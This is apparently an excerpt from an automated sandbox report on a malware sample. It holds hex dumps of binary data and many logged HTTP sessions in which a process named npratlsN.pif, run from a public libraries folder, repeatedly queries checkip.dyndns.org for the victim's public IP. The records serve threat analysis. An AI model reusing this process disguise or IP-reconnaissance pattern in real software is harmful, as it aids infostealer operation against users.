                                                                                                                                                                        Jan 6, 2025 07:53:15.232093096 CET448INData Raw: e8 da fe ff ff c7 05 08 17 47 00 08 17 47 00 c7 05 0c 17 47 00 08 17 47 00 be 00 04 00 00 ba a8 17 47 00 8b c2 89 00 89 40 04 83 c2 08 4e 75 f3 c7 05 ac 37 47 00 ac 37 47 00 c7 05 b0 37 47 00 ac 37 47 00 5f 5e 5b c3 8d 40 00 53 56 57 55 bb 08 17
                                                                                                                                                                        Data Ascii: GGGGG@Nu7G7G7G7G_^[@SVWUG7G{ohjW;u7<FHH@3H Ju[G@Ju^{hjS(;u6v]_^[=7Gt7GP3
                                                                                                                                                                        Jan 6, 2025 07:53:15.232108116 CET1236INData Raw: 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 67 3a 00 00 83 b8 00 00 00 00 00 74 0f e8 59 3a 00 00 8b 80 00 00 00 00 8b 40 08 c3 33 c0 c3 e8 47 3a 00 00 83 b8 00 00 00 00 00 74 0f e8 39 3a 00 00 8b 80 00 00 00 00 8b 40 04 c3 33 c0 c3 53 56 e8 25 3a 00 00
                                                                                                                                                                        Data Ascii: Yt@g:tY:@3G:t9:@3SV%:t:^:3F3^[@FSV=GtGu9w4F^[@$PRQ9Y
                                                                                                                                                                        Jan 6, 2025 07:53:15.232121944 CET1236INData Raw: da dd 14 02 dd 54 02 08 83 c2 10 7c f4 dd c0 c3 90 90 90 85 d2 7e 50 88 4c 02 ff 83 e2 fe f7 da 8d 14 55 80 32 40 00 ff e2 90 90 66 89 48 1c 66 89 48 1a 66 89 48 18 66 89 48 16 66 89 48 14 66 89 48 12 66 89 48 10 66 89 48 0e 66 89 48 0c 66 89 48
                                                                                                                                                                        Data Ascii: T|~PLU2@fHfHfHfHfHfHfHfHfHfHfHfHfHfHf@SVWPtl11F t-tb+t_$t_xtZXtU0uFxtHXtCt t-0w%9w!Fut}TF~KxI[)G


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.449753158.101.44.242808112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:25.358736038 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:25.951505899 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:25 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 1f16da6f836abbdd3acfce29213a8e74
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                        Jan 6, 2025 07:53:25.956243038 CET127OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:26.110516071 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:26 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: a737fe76d434948f290864ab5942bdbf
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                        Jan 6, 2025 07:53:27.121128082 CET127OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:27.275130033 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:27 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 1bca0f57af2961b11e05f72de9bf97e3
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                        Jan 6, 2025 07:53:27.495455027 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:27 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 1bca0f57af2961b11e05f72de9bf97e3
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.449756158.101.44.242808112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:27.942979097 CET127OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:28.540904045 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:28 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: eb97e2ed5b6f967f1d251b9a4e87310c
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.449758158.101.44.242808112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:29.159089088 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:30.338243961 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:30 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: c4bce2ce8b366bba7a25746b42183bed
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.449761158.101.44.242808112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:30.971338034 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:32.220906019 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:32 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 960b4dda42800a1c1073e81b3343e02c
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.449763158.101.44.242808112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:32.965786934 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:33.863693953 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:33 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 6f3f83ac002dfa9c409e6ca50083ceb0
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.449765158.101.44.242808112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:34.609577894 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:36.187396049 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:36 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 99acf69d07bce7afe97d58cce2120237
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.449767158.101.44.242803980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:36.085757971 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:37.275969982 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:37 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 6c1eec7c7d61346bf855029c98f249ed
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                        Jan 6, 2025 07:53:37.280905008 CET127OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:37.440182924 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:37 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 9bb069748482aee9dcc169e6578fe33c
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                        Jan 6, 2025 07:53:38.883150101 CET127OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:39.057595968 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:38 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: a5b6fc6edd580b7c71de1e85bede0118
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.449769158.101.44.242808112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:36.827065945 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:37.396461964 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:37 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: b0edd43d94d0ca8f674a0d22bac362b6
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                        Jan 6, 2025 07:53:37.607492924 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:37 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: b0edd43d94d0ca8f674a0d22bac362b6
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        9192.168.2.449772158.101.44.242808112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:38.107059956 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:38.952258110 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:38 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 0118c9422534a0b7f1a7f98e3ad83a45
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        10192.168.2.449779158.101.44.242803980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:39.689286947 CET127OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:40.307842970 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:40 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 51fc2f813d1ec0a1f95c070ee566ee0a
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        11192.168.2.449781158.101.44.242803980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:40.926707983 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:42.088367939 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:42 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: adcbfcb6148279fc2b690948851d3cd2
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        12192.168.2.449785158.101.44.242803980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:42.740613937 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:44.742666006 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:44 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: c76bbc3ef14ce634f07efb2681eb5c29
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        13192.168.2.449786158.101.44.242807692C:\Users\Public\Libraries\npratlsN.pif
